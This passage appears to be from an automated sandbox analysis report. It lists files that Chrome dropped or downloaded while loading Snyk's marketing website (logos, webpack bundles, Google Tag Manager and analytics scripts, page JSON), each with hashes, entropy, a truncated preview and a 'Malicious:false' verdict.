                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8160
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9031254910445083
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:hyra4iBhVLMSxnQbTqk2jX5Z7xvF0FDgpQQ:hyrSzMSxnQTqk2FZCDgpP
                                                                                                                                                                                                                                                                                                              MD5:157C7981E877D6F1581F2EBF718D2F2C
                                                                                                                                                                                                                                                                                                              SHA1:1C39C4B009E00AE68D63A0B64E1312B23FE9467B
                                                                                                                                                                                                                                                                                                              SHA-256:997576FD3049A0EBE50FD50B5ED3680BABC034046C15C5E51BCD456379F566B5
                                                                                                                                                                                                                                                                                                              SHA-512:BE7ECCBB215E77922179545C3564FB54CF03A789DCED07BE9BBEE2D7BB167BEA86CB73A548C0C7606441E5E7E10870831D09564E03DA45D39F2B267FE8FB09B4
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg width="160" height="48" viewBox="0 0 160 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_8331_28951)">.<path d="M23.3799 18.08C23.3799 19.061 23.089 20.02 22.544 20.8356C21.999 21.6513 21.2243 22.287 20.3179 22.6625C19.4116 23.0379 18.4144 23.1361 17.4522 22.9447C16.4901 22.7533 15.6063 22.2809 14.9126 21.5873C14.219 20.8936 13.7465 20.0098 13.5552 19.0477C13.3638 18.0855 13.462 17.0882 13.8374 16.1819C14.2128 15.2756 14.8486 14.5009 15.6642 13.9559C16.4799 13.4109 17.4389 13.12 18.4199 13.12C19.7327 13.1284 20.9895 13.6537 21.9179 14.582C22.8462 15.5104 23.3715 16.7671 23.3799 18.08ZM18.4199 24.96C17.4389 24.96 16.4799 25.2509 15.6642 25.7959C14.8486 26.3409 14.2128 27.1156 13.8374 28.0219C13.462 28.9282 13.3638 29.9255 13.5552 30.8877C13.7465 31.8498 14.219 32.7336 14.9126 33.4272C15.6063 34.1209 16.4901 34.5933 17.4522 34.7847C18.4144 34.9761 19.4116 34.8779 20.3179 34.5024C21.2243 34.127 21.999 33.4913 22.544 32.6756C23.089 31.86 23.3799 30.901 23.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9887), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):9887
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.324944220647428
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:VrPahIxyyGGtu4BvGcm0j9Ha24gKBKbRSf:CIxyyvtup69HabZf
                                                                                                                                                                                                                                                                                                              MD5:7DF67DDE87FA6D7CF73573588D4BCB3D
                                                                                                                                                                                                                                                                                                              SHA1:34F60FEC284A05D70B773872DE50C9B00CBD638E
                                                                                                                                                                                                                                                                                                              SHA-256:DE02755097ED5302499104CDDE5E20F359B2FF96162997730DF39A942A8B44E8
                                                                                                                                                                                                                                                                                                              SHA-512:CF55C057432DCAD1A1988CC4FEE129C5DD27E2AC0B68E2FD97E7ECC16AC847F27284DB5EF30C1323820250863803EE33B23E5C69EF0F2216124A4712BF51C0FF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5030],{65840:function(e,t,a){a.d(t,{Z:function(){return u}});var o=a(85893),r=a(45697),i=a.n(r),n=a(64119),s=a(15020),l=a(6215),c=a(44133);function d(e){var t,a;let{colorScheme:r,className:i}=e;return(0,o.jsx)("div",{className:(0,c.Z)("d-flex items-center justify-center radius-full w-medium h-medium",r&&"bg-".concat(null===(t=l.k[r])||void 0===t?void 0:t.miniHeader,"-opal-1")),"data-component":"Feature Checkmark",children:(0,o.jsx)("div",{className:(0,c.Z)("d-flex",i,r&&"txt-".concat(null===(a=l.k[r])||void 0===a?void 0:a.miniHeader)),children:(0,o.jsx)(n.Z,{name:"check",size:"md",className:"scale-8"})})})}d.propTypes={colorScheme:i().oneOf(["",...s.ZP]),className:i().string};var u=d},86604:function(e,t,a){a.d(t,{Z:function(){return s}});var o=a(85893),r=a(45697),i=a.n(r);function n(e){let{children:t,className:a}=e;return(0,o.jsx)("figure",{className:a,"data-component":"Media Asset Container",children:t})}n.propTypes
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (11978)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):304033
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.620565599555389
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:kCjRo3k4a2ddBvif2s3qXk9n++0WBBNy2Uzo:bj2kr2bBKtWk
                                                                                                                                                                                                                                                                                                              MD5:50E23BAA61C5A1AEEDC3A5C6501063E1
                                                                                                                                                                                                                                                                                                              SHA1:F80F07A2C0AA70AF49D402AFE5AF37110C5D680A
                                                                                                                                                                                                                                                                                                              SHA-256:4B48FF01412E91D449CEE5D0F5FA0477E352322F3B558F7DD25215655F358E4E
                                                                                                                                                                                                                                                                                                              SHA-512:EDE5639405C0BB7C8B0711FEC21E1838562AFF6658094411BE1927BF547C838A40C5ED65BE9FBC1A655DEF08F79A197AB0E8350247F63E22372A8569FDF175B9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/destination?id=G-X9SH3KP7B4&l=dataLayer&cx=c
                                                                                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"5",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":31,"vtp_rules":["list","^www\\.snyk\\.marketing","snyk\\.io","(app|go|security|support|learn|docs|dev|training)\\.snyk\\.io","www\\.devseccon\\.com"],"tag_id":106},{"function":"__ogt_dma","priority":21,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":108},{"function":"__ogt_1p_data_v2","priority":21,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phon
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 580 x 169, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2575
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.76747646549308
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:X/6QpL3WACE1jLCt9Nu1ouWOl5r90YpMfy7B7D8ZK2hCjVAIXJDezids1voc:XSQtWXEo41TWObr9TGq7B385CxAKZRdm
                                                                                                                                                                                                                                                                                                              MD5:1B90EC2784A21EAEDCE6644AD0652E47
                                                                                                                                                                                                                                                                                                              SHA1:5541EDF7715299264D76D083ACEBD886E9CC3334
                                                                                                                                                                                                                                                                                                              SHA-256:6EFE5258DAA625543B83D0D418FC7A4A9FB7F4E3C34FF3B43B38E769C855516A
                                                                                                                                                                                                                                                                                                              SHA-512:1E8B087291A7D50080F3C8BFBA039FC748E1917529A5C870E0A0F5B867F24B20832CE4E93531E5F21A8394A2968214C72B1426C92EE2E1CD65D02D0B72DA6A41
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...D..........{.....!PLTELiq.v..v..v..t..u..t..v..u..w..|.)8.~....tRNS....>).q.m1.....pHYs.................IDATx...v. .E.w......d...p...s.fu.....U.RS.h....>m..v........(.5.......{...i..!.DW..4|..5!.(g...O.5...U.I..Gw.z{..<D9.../...AW/e.i....E..6w......mN.E7.\s..(..*..E..Pw.QB...0.......f.R.X....6.4hJ..1......OWDh.....0..\H..P[+."BU.....+Rl.h.P...3vhv...O.-..y.5.\Q.._3.gm...Vr..NQ.".>T.D.W.....uA......."%.=.Q.ODiy......n......C.%.0..dc.|.).d#.=..Z........,....G..P...k#(.UuGP.^.Fx,...!<....{.:..1..]..gwr.-C....y`..y1.!i.u....m.....:..t....@.`....1x..{..!..+....r.%k..j... .. .. .. .. .....?kZ..,.D..wh@..V.K.......@.O........]....YF...x..1.>.3....".....Jn....@7.....h..Z.T|....@.xe)o..z..!..1+ .L=....T./#....k.!....?_.}`.."....!.!:4L..j...:_"..].X.....|.......h\.g..6!...A..].....q..C.u.R..=../.q.B..0Do.. ...)........ .....l.D.....v.b.. ....j.....&.:F.h1.N1......I.6.....-..=.xP. Z...I.Ms...D+A.8u.i/SD.h!...w...A.........wG..u z.1.|y....2
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1961
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.752099580772157
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:YmTHfDUS31H3gqKWX1bq/aCGB6MMUsN7DLEbAlWuIQqt5nnwA5:tTpXg8X12/5CsN7DLMA9QhX
                                                                                                                                                                                                                                                                                                              MD5:640BC690CB418D6D421EAF272DAEAFF3
                                                                                                                                                                                                                                                                                                              SHA1:FD13A02624B174879D0B781736F589F4728BF8A1
                                                                                                                                                                                                                                                                                                              SHA-256:905A6E55DAA962EAF4191B6A13D22AB1072ED2C6AE57FAE625E64281D4617EEA
                                                                                                                                                                                                                                                                                                              SHA-512:37CA700FD020999D9DCF8E74D9AD84EEC71B40B01A2B48AD4C221C838BEC58C514D8BB85A03667E8A824E41831709E19BFD58AC891E279A85A328FB5E31282CD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/snyk-mktg-brandui/product-logos/code.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><linearGradient id="a" gradientUnits="userSpaceOnUse" x1="12.7808" x2="70.169" y1="3.99999" y2="17.4721"><stop offset="0" stop-color="#9043c6"/><stop offset="1" stop-color="#145deb"/></linearGradient><linearGradient id="b" gradientUnits="userSpaceOnUse" x1="23.4167" x2="64.6667" y1="22" y2="61.5833"><stop offset="0" stop-color="#14b7eb"/><stop offset="1" stop-color="#145deb"/></linearGradient><g clip-rule="evenodd" fill-rule="evenodd"><path d="m29.1091 60.3503c.1246.0178.2511.0178.3757 0 .1247.0178.2512.0178.3758 0 4.1422-1.3956 7.7027-3.1691 10.7013-5.3503h-11.0619c-2.4853 0-4.5-2.0147-4.5-4.5v-27c0-2.4853 2.0147-4.5 4.5-4.5h23.4685v-6.7361c.0118-.2587-.0624-.5141-.2111-.7262-.1486-.2122-.3634-.3692-.6109-.4466l-22.3094-7.03708c-.2293-.07203-.4752-.07203-.7045 0l-22.30944 7.03708c-.24742.0774-.46222.2344-.6109.4466-.14869.2121-.22289.4675-.21103.7262v14.0741c0 17.9092 7.3
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (43489), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):43554
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.12853225291825
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:w1rdZ4IueymYs3BwEMVvpxl+fm9re9PE8waHe:Urdmbe7sXr9faHe
                                                                                                                                                                                                                                                                                                              MD5:8D7FEF3250BD4835198C9BC6E8C3359B
                                                                                                                                                                                                                                                                                                              SHA1:54F1956CD697A8E00F6F393B055CEC6159E6BAC8
                                                                                                                                                                                                                                                                                                              SHA-256:6AE9B94A90851F0767AA67729073E26B5D2A6D928B587EFD1C7E83B795A7543D
                                                                                                                                                                                                                                                                                                              SHA-512:04EF443261191A32E3607809898308C74197AD0A913713F34D96B6E3CCC1F34D7462A80ADF767F0E0C4D6C0AFDAEDD53E828E67FD02BC1B326F35C7EBD0A05B2
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4QATfMKSPkK9MJJ5OWXIfy","type":"Entry","createdAt":"2024-10-02T12:00:03.564Z","updatedAt":"2024-10-02T16:56:21.341Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":41,"revision":3,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templatePressRelease"}},"locale":"en-US"},"fields":{"internalName":"Snyk.s AI-Native SAST Product Passes $100M in ARR - Press Release","title":"Snyk.s AI-Native SAST Product Passes $100M in ARR","slug":"snyks-ai-native-sast-product-passes-100m-in-arr","featuredImage":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1727870043/feature-code-rise.png","tags":[],"type":"upload","bytes":715765,"width":1200,"format":"png","height":628,"version":1727870043,"duration":null,"metadata":{},"public_id":"feature-code-rise","created_at":"2024-10-02T11:54:03Z",
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 15942
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):4743
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.949959131960823
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:5rk2n5vDZODWx7VwegK1sURWyRr+iie1VjiJ7zSIwWpYsdhMobUn:G2pDVx7Vbl1sURhhie1ANNisdGAk
                                                                                                                                                                                                                                                                                                              MD5:6A3ED21F9B6777C0C37E6E248EA22387
                                                                                                                                                                                                                                                                                                              SHA1:3BC32DC9AFFC61AA325B418166CF18E7C275B0E8
                                                                                                                                                                                                                                                                                                              SHA-256:4ADDCD9471A0DC0B228983E72308047F37BDFDD04CE20A9B97F43DE101AFC334
                                                                                                                                                                                                                                                                                                              SHA-512:5EE0DCD9A594DE8E9B1DA6366811CCE4AA83C27EA09AD80C188C203B5C3FA7BA0F65656937B6421C13E1F7BA6A054C4585E0FDB9A85EB8765F792DEC38F33E76
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://cdn.segment.com/next-integrations/integrations/google-analytics/2.18.5/google-analytics.dynamic.js.gz
                                                                                                                                                                                                                                                                                                              Preview:...........[.o.9.......h..N.....J...$..n...y|...f.2.V..d..Y......aK.v.8 ...&...U...Y.....Z..{..tc$.D..[N.d....U..T.>..0.8.j..j.~<M~...?.J.&..?.=........o.KDai_..G.a4....E6....ig.".%mf...OLh.......0.Y.,..?.K....KR......|..Td+s=/.<...rI._~...y..2.\..L...>.*.....iX..M..-..u...:..|,"X.'s\G6..DG...$...XdK...R...v5_.+....W&..h^.L...,..M(I...`.*.v.k..pF...3.dM...^E..,IF.N...s.L..8..1..._.O.(-..x....h.AI.:O%....{r..AY.b...v............dG$.J.b..)...V.U..../.*....b...3C...).:g..]....,.U=.(...*Nq.M..k*..9.1..O.!*.g..b..Vg..+...D.{..kQ..T..J...E;.Wt.7(37;..(....|./U:....Q.M!..l5.>...X....b..SI..`...&...BW..iG'n...}{(.S...G+...mj...s..+...~*....t....K.$w...x!..aV.i..a.zh.......}..]...S. m..2YD..@=...4..H.].'D...l.]..j.}.y.u..i.......5T.j..Hg#...C........T..248.i.4.,.9u67...9.7..*./2.....=h.Z.0...$....]...'<..88._O..%.%N.../.0..S.5s."....T6..w........<t..s..Uap.........F.Z.&O..0,.!_((s,...y.e...O......?...(.....?.5.|p......?.(..V.....r...(.XN...?.|......
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (18122)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):240152
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.520329426268163
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:/IfEnRhbIGc3kWh61ZF0cSncEjCPfrgiA4as3rOXk9nObg0:TRo3k4+CJviKs3qXk9nOb3
                                                                                                                                                                                                                                                                                                              MD5:A209ECD05BDCEA6C58CE95E210D4327C
                                                                                                                                                                                                                                                                                                              SHA1:AE88703288771B99675C1EF65798DBF8ABC19C9B
                                                                                                                                                                                                                                                                                                              SHA-256:1028223B987170599F4FEEC982A3C126F7668FB8C552DA1910EBBA875934F49A
                                                                                                                                                                                                                                                                                                              SHA-512:2C06F40C7422CBAAC596F0A4A1B584019C2AB87A3A109D1969767635EC25056A672A60E916204402561BB250FEC78E9F5961ED3ED2DB3313407A383A1B7DA319
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtm.js?id=GTM-T8QMQW9
                                                                                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"28",. . "macros":[{"function":"__e"},{"function":"__e"},{"function":"__c","vtp_value":"G-X9SH3KP7B4"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"category_name"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"cta_location"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"cta_name"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"cta_type"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"link_url"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"outbound"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"subcategory_name"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"newsletter_name"},{"function":
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (59195), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):59224
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1578474908107355
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:OLR1G60CchfglZYdHYloGcZoEMVvpxl+fm9re9PE8waMe:o07CchwkHNSXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:56F751A14AB4CC65718AE0D2294F2F12
                                                                                                                                                                                                                                                                                                              SHA1:5FD59323418398AAC8EA0E14D04B821B97380597
                                                                                                                                                                                                                                                                                                              SHA-256:098545A8CF3BDFC69186D80F3D5502A9A77A2EFD2C227F513791D2A04B54903F
                                                                                                                                                                                                                                                                                                              SHA-512:06E9D8399D4D69DABEB07D5B92A95571E41FA56D984CEB0458164FD81DECDFFD10FCB752DBFD5D0BEE341159E22C52F5C225551012CB66ABC95AFD6357E84FFC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5SuIVtw89WA8kEnZn4iQW8","type":"Entry","createdAt":"2023-06-07T13:17:37.143Z","updatedAt":"2024-10-08T15:49:04.200Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":47,"revision":6,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"AI Platform page","title":"DeepCode AI | AI Code Review | AI Security for SAST | Snyk AI","slug":"snyk-powered-by-deepcode-ai","uri":"platform/deepcode-ai","pageLocalization":["ja","de","fr","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4AjR4bFcNfaVsKRadzmHgW","type":"Entry","createdAt":"2023-06-07T13:17:37.239Z","updatedAt":"2024-10-08T15:49:04.717Z","environment":{"sys":{"id":"master","typ
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6105), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):6105
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.238378421291859
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:+EZXcOEW5zT8xq8dJbmgMHByoFvvkU/zOv3qBQvSboMt+ssGV0aOGstBvp:kW5z/cmJBy4zOv3qSKBL2aO/
                                                                                                                                                                                                                                                                                                              MD5:D74CC4825C8E333B2116DA3FCC649DB1
                                                                                                                                                                                                                                                                                                              SHA1:B48D09A14C1CD6333F1D2D811675B771F2A38A00
                                                                                                                                                                                                                                                                                                              SHA-256:4A007AF67F716C30C8848AB0AD0BFAAB8A5FCF3E36DEDF918B59C9429D522440
                                                                                                                                                                                                                                                                                                              SHA-512:FBAD39A642A7AF5167B8F1AB37510B83817CD90E19C3286CA6B76A1CC8C383E45216C1C8F8A03A10916C21960FF625F67A059017ABD5834F17B2BC9E41CCB4C8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:!function(t){function e(i){if(n[i])return n[i].exports;var o=n[i]={i:i,l:!1,exports:{}};return t[i].call(o.exports,o,o.exports,e),o.l=!0,o.exports}var n={};e.m=t,e.c=n,e.i=function(t){return t},e.d=function(t,n,i){e.o(t,n)||Object.defineProperty(t,n,{configurable:!1,enumerable:!0,get:i})},e.n=function(t){var n=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(n,"a",n),n},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="",e(e.s=5)}([function(t,e,n){"use strict";Object.defineProperty(e,"__esModule",{value:!0});var i={get:function(t){for(var e=t+"=",n=decodeURIComponent(document.cookie),i=n.split(";"),o=0;o<i.length;o++){var u=i[o].trim();if(0==u.indexOf(e))return u.substring(e.length,u.length)}return null},set:function(t,e,n){var i=new Date;i.setTime(i.getTime()+24*n*60*60*1e3);var o="expires="+i.toUTCString();document.cookie=t+"="+e+";"+o+";path=/"}};e.default=i},function(t,e,n){"use strict";function i(t,e){var n=new XMLHttpRequest;n.on
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2178
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.661839168851514
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:YmTHV/UUS31HUVHhWB1rS7TeT5pB6MMU+4pBbUz/RkjX346CiZT0Ic:tT1i0V8B1rUKtCC+Soz/xvit0v
                                                                                                                                                                                                                                                                                                              MD5:98006D843AD15D2FD94BF5976616057B
                                                                                                                                                                                                                                                                                                              SHA1:0ABE10ED106B2CAB2C3E74370E84D4D5BD3EF8BD
                                                                                                                                                                                                                                                                                                              SHA-256:EA7809760ED48C05CE98FF011046DD45DFF75F0C0829F385E298C018AE4E4220
                                                                                                                                                                                                                                                                                                              SHA-512:25DD7BD4C8C4B3ECED669258387CB99DF074241B4C27EE67C10396DEAEF2E7C086EE93D31CDD5B8B054BEE6EB8E6F4B90A2C6C97481323D4505BFA758D45F904
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><linearGradient id="a" gradientUnits="userSpaceOnUse" x1="10.7808" x2="68.169" y1="3.99999" y2="17.4721"><stop offset="0" stop-color="#9043c6"/><stop offset="1" stop-color="#145deb"/></linearGradient><linearGradient id="b" gradientUnits="userSpaceOnUse" x1="26.2413" x2="73.3406" y1="20.9091" y2="34.2228"><stop offset="0" stop-color="#43b59a"/><stop offset="1" stop-color="#145deb"/></linearGradient><g clip-rule="evenodd" fill-rule="evenodd"><path d="m27.1091 60.3503c.1246.0178.2511.0178.3757 0 .1247.0178.2512.0178.3758 0 1.4278-.481 2.7864-1.007 4.0768-1.579l-12.5621-7.8315-.1019-.0763c-.893-.668-1.728-1.8674-1.728-3.3748 0-1.2633.5866-2.6834 1.8708-3.4813l-.0374-.0232-.1054-.0789c-.893-.668-1.728-1.8674-1.728-3.3748 0-1.5075.835-2.7068 1.728-3.3748l.0893-.0669-.0893-.0668c-.7949-.5947-1.728-1.6949-1.728-3.3749 0-1.3101.6309-2.7888 2.0165-3.5673l18.5467-11.5625.0234-.014c1.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2345)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):194039
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.5276842648771245
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:BJRhbIGc3kWh7ZF0QSncEjCPfrgiAmas3rOXk9nlrb:fRo3k47KJvius3qXk9nl/
                                                                                                                                                                                                                                                                                                              MD5:3FA5B2ED7D6C69E350F8BEC1BA4C2BBD
                                                                                                                                                                                                                                                                                                              SHA1:0C99B46B126E33FD0DBBF006C6EAA6FA386DFE81
                                                                                                                                                                                                                                                                                                              SHA-256:3F52EE63B46C3F54AA45799FB38E6FFA42E4526B6AE806E82E2CBA39B70A93FA
                                                                                                                                                                                                                                                                                                              SHA-512:D09AA326E2F016D85573E50CD5C43B87DFFF39B391E4BED2232EE56B7191DC8F319BC049E530905EF51BFD5396DD4EDE9DB169495031742F0FCC58994D46BA95
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"163",. . "macros":[{"function":"__e"},{"function":"__dee"}],. "tags":[{"function":"__asprv","vtp_globalName":"google_optimize","vtp_listenForMutations":false,"tag_id":10},{"function":"__asprv","tag_id":11}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":["macro",1]},{"function":"_eq","arg0":["macro",0],"arg1":"optimize.callback"}],. "rules":[[["if",0],["add",0]],[["if",1],["add",1]]].},."runtime":[ [50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. .].,"entities":{."__e":{"2":true,"4":true}...}.,"blob":{"1":"163"}.,"permissions":{."__e":{"read_event_data":{"eventDataAccess":"specific","keyPatterns":["event"]}}...}....,"security_groups":{."google":[."__e"..]...}....};.....var aa,ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ca=typeof Object.defineProperties=="functio
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
